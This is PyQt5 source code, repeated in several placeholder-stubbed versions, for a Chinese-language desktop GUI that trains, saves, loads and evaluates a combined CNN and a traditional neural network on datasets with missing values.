else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = 
fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n 
self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n 
trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is 
self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, 
QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n 
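# showJudge above bails out with a message box whenever a training run is
# active, keyed by self.traingWidgetOnFlag ('traing' is a typo for 'training'
# carried through the codebase, kept as-is here). A hedged sketch of the same
# guard factored into a reusable decorator; requires_idle is an invented name:
from functools import wraps

def requires_idle(kind):
    def deco(method):
        @wraps(method)
        def wrapper(self, *args, **kwargs):
            if self.traingWidgetOnFlag[kind]:
                # same notification the original pops up ('提示' / '训练正在进行',
                # i.e. 'Notice' / 'Training in progress')
                QMessageBox.information(self, '提示', '训练正在进行',
                                        QMessageBox.Yes, QMessageBox.Yes)
                return
            return method(self, *args, **kwargs)
        return wrapper
    return deco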
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n 
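# The two connect calls above route both loss-parameter buttons into a single
# slot, which later tells them apart via self.sender(). A self-contained sketch
# of that shared-slot dispatch pattern; the widget names are illustrative:
import sys
from PyQt5.QtWidgets import QApplication, QPushButton, QVBoxLayout, QWidget

class SenderDemo(QWidget):
    def __init__(self):
        super().__init__()
        self.btn_a = QPushButton('A')
        self.btn_b = QPushButton('B')
        box = QVBoxLayout(self)
        box.addWidget(self.btn_a)
        box.addWidget(self.btn_b)
        # both buttons share one slot ...
        self.btn_a.clicked.connect(self.on_click)
        self.btn_b.clicked.connect(self.on_click)

    def on_click(self):
        # ... and sender() identifies which button emitted the signal;
        # identity comparison with `is` mirrors the original code.
        if self.sender() is self.btn_a:
            print('A clicked')
        elif self.sender() is self.btn_b:
            print('B clicked')

if __name__ == '__main__':
    app = QApplication(sys.argv)
    w = SenderDemo()
    w.show()
    sys.exit(app.exec_())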
self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n 
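# API note for the getOpenFileName call above: PyQt5 returns a
# (fileName, selectedFilter) tuple -- the second element is the chosen filter
# string, not a boolean. Both come back empty when the dialog is cancelled, so
# `if ok:` happens to behave like an accept flag, but the conventional guard
# tests the path itself. Sketch of the usual pattern:
#
#     fname, _filter = QFileDialog.getOpenFileName(
#         self, 'Load Model', '..', 'Combine-CNN json files (*.cbcnn.json)')
#     if fname:  # empty string means the user cancelled
#         ...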
